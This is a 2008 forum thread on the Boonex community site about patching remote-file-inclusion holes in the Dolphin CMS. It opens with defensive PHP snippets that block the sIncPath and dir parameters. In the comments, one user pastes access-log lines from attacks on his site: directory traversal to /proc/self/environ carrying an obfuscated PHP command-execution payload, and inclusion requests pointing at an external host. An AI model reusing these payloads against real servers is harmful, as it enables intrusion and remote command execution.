Fix for dolphin exploit

sammie posted 15th of July 2008 in Community Voice. 32 comments.

add the fllowing code to your ray/modules/global/inc/content.inc.php

add it at the top above the 1st require once command

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

so it looks like this :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

this stops any remote includes being used

next edit /plugins/safehtml/HTMLSax3.php  add this at the top above the require once

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

so it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

this stops remote access to your directories

 
Comments
·Oldest
·Top
Please login to post a comment.
paramike
Thank you so very much ...
sammie
you are most welcome sweetie, hey it was only $30 so well worth it to make sure i dont get hacked too, but they looked over my server and told me its secure and that fix will kill remote attack attempts on dolphin. as soon as i tested my site still works and can still upload and post on the forums, its cool i posted it here.
shaneed
Hi sammie. I'm using Dreamweaver to access my Dolphin to edit files. That is also called remote access. If i add those codes would i still be able to edit files using Dreamweaver?
clubk1d
thanks for sharing!!! :D
AndreyP
Sammy, good :)
PS we involved to making fast-fix-patch that close all such holes in security for old PHP versions to prevent change variables via GET params, or if register globals is On,
Also we close another security holes (just because here not only this way to hack any sites)
I spend several days and found many ways to hack any sites. So register globals and all fixes above just more simpliest and old way :)
sammie
ty sweetie, coming from you that means a lot. and glad i could help. that should kill all attacks.
i was never hacked, but i wanted to be 100% sure my server was secure so asked them to look at the attacks and fix it. thats what they came up with, but they also said there is still some questionable code in the content.inc.php file
DoLaugh
Sammie, thanks, hopefully we can return the favor down the road!

DoLaugh
sammie
anytime sweetie, hope a lot more members can sleep better tonight.
jerry79
Thanks a lot Sammie! First i thought its another "how to safe my site" post as the others. ;) But it contains new informations on how to ge rid of some hackers. Thanks for your share! Ill update my files!

Greets,
Jerry
Stuart038
Sammie, many thanks. Very generous!!

All the best.

Stuart
Ps. what was that about questionable code...?
sammie
they told me there is some questionable code in ray/modules/global/inc/content.inc.php

i am not a programmer so didnt ask, and they might have charged me more lol

i think boonex are working on that file now to solve the issues.
clubk1d
don't forget also to thank all folks out there who spend some time, just to keep your websites clean and clear from any bugs and intruders! :)
gameutopia
Thanks for posting this. Even if it's not the official patch maybe it will help a few folks while we await the official word. Any time something like this is posted I'm certainly going to look into it and check it out. Thanks Again!!
sammie
there is another exploit found that can affect sites with register globals off, i am hoping to have a patch for this tomorrow. boonex have been informed so hope they can include it in their patch, but it might delay their patch a little longer
Habitual
Sammie:
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)

boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.

Believe me, I want to see this activity solved once and for all.
I remain hopeful.

You mentioned "here see more is another exploit found" : can you elaborate, if not openly then some other way?
ken707
My index.php was hacked.

Trying this mod now. My site has been hacked several times after the dolphin security fix. I have followed all security instructions and keeping getting hacked through Boonex scripts.
ken707
hack code used on my site,

//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; see more $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
ken707
more

83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 see more - - [19/Sep/2008:20:38:47 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
83.64.48.195 - - [19/Sep/2008:20:38:48 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
ken707
more

/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19
ken707
more
POSSIBLE

/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en
kinder
thx sammie, no troubles yet, but hope to keep it this way. thx for sharing.
corfukids
my look like this Why? anyideas anyone? i getting hacked all the time?

i have an extra row as you can see header.inc

require_once('header.inc.php');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
sammie
Because you have the updated version
you can still apply the patch if you wish. but you should be safe is you are on a server with register_globals off
WDBArnyVee
With 7.0 and the 'extras' being incorporated or integrated into the Dolphin script, will we have to continue to do these file edits like these, you think?
BigWil
Wow these kiddies are very persistent even with the latest versions. You would have thought their makers would have included a version check. My logs are full of the sIncPath attempts. Of course thats my mod_security logs that are full so they are getting nothing but a 403 error. Still though digging through the logs is a pain.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.13860297203064